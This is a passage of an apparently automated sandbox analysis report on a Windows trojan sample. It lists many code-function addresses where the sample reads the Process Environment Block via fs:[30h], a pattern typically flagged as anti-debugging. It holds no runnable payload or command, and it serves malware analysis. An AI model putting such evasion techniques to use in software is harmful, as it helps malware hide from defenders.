          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2DB40 mov eax, dword ptr fs:[00000030h]3_2_00A2DB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8B58 mov eax, dword ptr fs:[00000030h]3_2_00AF8B58
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2F358 mov eax, dword ptr fs:[00000030h]3_2_00A2F358
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53B5A mov eax, dword ptr fs:[00000030h]3_2_00A53B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53B5A mov eax, dword ptr fs:[00000030h]3_2_00A53B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53B5A mov eax, dword ptr fs:[00000030h]3_2_00A53B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53B5A mov eax, dword ptr fs:[00000030h]3_2_00A53B5A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A24CB0 mov eax, dword ptr fs:[00000030h]3_2_00A24CB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5D4B0 mov eax, dword ptr fs:[00000030h]3_2_00A5D4B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF9CB3 mov eax, dword ptr fs:[00000030h]3_2_00AF9CB3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A21480 mov eax, dword ptr fs:[00000030h]3_2_00A21480
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3849B mov eax, dword ptr fs:[00000030h]3_2_00A3849B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]3_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2649B mov eax, dword ptr fs:[00000030h]3_2_00A2649B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2649B mov eax, dword ptr fs:[00000030h]3_2_00A2649B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE14FB mov eax, dword ptr fs:[00000030h]3_2_00AE14FB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AA6CF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AA6CF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AA6CF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5CCC0 mov eax, dword ptr fs:[00000030h]3_2_00A5CCC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5CCC0 mov eax, dword ptr fs:[00000030h]3_2_00A5CCC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5CCC0 mov eax, dword ptr fs:[00000030h]3_2_00A5CCC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5CCC0 mov eax, dword ptr fs:[00000030h]3_2_00A5CCC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]3_2_00AF8CD6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A22CDB mov eax, dword ptr fs:[00000030h]3_2_00A22CDB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5BC2C mov eax, dword ptr fs:[00000030h]3_2_00A5BC2C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3B433 mov eax, dword ptr fs:[00000030h]3_2_00A3B433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3B433 mov eax, dword ptr fs:[00000030h]3_2_00A3B433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3B433 mov eax, dword ptr fs:[00000030h]3_2_00A3B433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A42430 mov eax, dword ptr fs:[00000030h]3_2_00A42430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A42430 mov eax, dword ptr fs:[00000030h]3_2_00A42430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53C3E mov eax, dword ptr fs:[00000030h]3_2_00A53C3E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53C3E mov eax, dword ptr fs:[00000030h]3_2_00A53C3E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53C3E mov eax, dword ptr fs:[00000030h]3_2_00A53C3E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A24439 mov eax, dword ptr fs:[00000030h]3_2_00A24439
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]3_2_00AA6C0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]3_2_00AA6C0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]3_2_00AA6C0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]3_2_00AA6C0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]3_2_00AF740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]3_2_00AF740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]3_2_00AF740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]3_2_00AE1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8C14 mov eax, dword ptr fs:[00000030h]3_2_00AF8C14
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4746D mov eax, dword ptr fs:[00000030h]3_2_00A4746D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]3_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A65C70 mov eax, dword ptr fs:[00000030h]3_2_00A65C70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8C75 mov eax, dword ptr fs:[00000030h]3_2_00AF8C75
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]3_2_00A5AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5A44B mov eax, dword ptr fs:[00000030h]3_2_00A5A44B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h]3_2_00ABC450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h]3_2_00ABC450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8450 mov eax, dword ptr fs:[00000030h]3_2_00AF8450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h]3_2_00AF05AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h]3_2_00AF05AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A535A1 mov eax, dword ptr fs:[00000030h]3_2_00A535A1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A565A0 mov eax, dword ptr fs:[00000030h]3_2_00A565A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A565A0 mov eax, dword ptr fs:[00000030h]3_2_00A565A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A565A0 mov eax, dword ptr fs:[00000030h]3_2_00A565A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]3_2_00A51DB5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]3_2_00A51DB5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]3_2_00A51DB5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]3_2_00A52581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]3_2_00A52581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]3_2_00A52581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]3_2_00A52581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]3_2_00A22D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]3_2_00AE2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]3_2_00AE2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]3_2_00AE2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]3_2_00AE2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]3_2_00AE2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]3_2_00AE2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]3_2_00AE2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEB581 mov eax, dword ptr fs:[00000030h]3_2_00AEB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEB581 mov eax, dword ptr fs:[00000030h]3_2_00AEB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEB581 mov eax, dword ptr fs:[00000030h]3_2_00AEB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEB581 mov eax, dword ptr fs:[00000030h]3_2_00AEB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A23591 mov eax, dword ptr fs:[00000030h]3_2_00A23591
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h]3_2_00A5FD9B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h]3_2_00A5FD9B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A3D5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A3D5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A595EC mov eax, dword ptr fs:[00000030h]3_2_00A595EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_00AEFDE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_00AEFDE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_00AEFDE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_00AEFDE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A295F0 mov eax, dword ptr fs:[00000030h]3_2_00A295F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A295F0 mov ecx, dword ptr fs:[00000030h]3_2_00A295F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]3_2_00AD8DF1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AA6DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A215C1 mov eax, dword ptr fs:[00000030h]3_2_00A215C1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ADFDD3 mov eax, dword ptr fs:[00000030h]3_2_00ADFDD3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h]3_2_00A5F527
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h]3_2_00A5F527
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h]3_2_00A5F527
